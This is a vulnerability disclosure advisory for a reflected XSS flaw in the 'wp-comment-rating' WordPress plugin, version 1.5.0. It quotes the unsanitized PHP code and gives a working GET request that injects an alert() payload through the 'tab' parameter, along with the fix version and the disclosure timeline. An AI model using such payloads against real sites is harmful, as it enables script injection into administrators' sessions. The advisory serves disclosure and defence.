## FULL DISCLOSURE


#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link :
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"tab" parameter is not sanitized that leads to Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpb_plugin_admin_page.php

line:194
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';

line:553
$active_tab = $this->current_tab;

line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ?
$this->tabs[0]->
get_id() : $active_tab;

line:561
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' .
$active_tab; ?>">

----------------------------------------
Exploit:
----------------------------------------
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=">
< input type=text onclick=alert(/XSS/)><!--
 ----------------------------------------

POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
→ January 24, 2015  – Bug discovered, initial report to Vendor
→ January 25, 2015  – Vendor Acknowledged
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#            CTG SECURITY SOLUTIONS  #
#             www.ctgsecuritysolutions.com
<http://www.ctgsecuritysolutions.com/>  #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710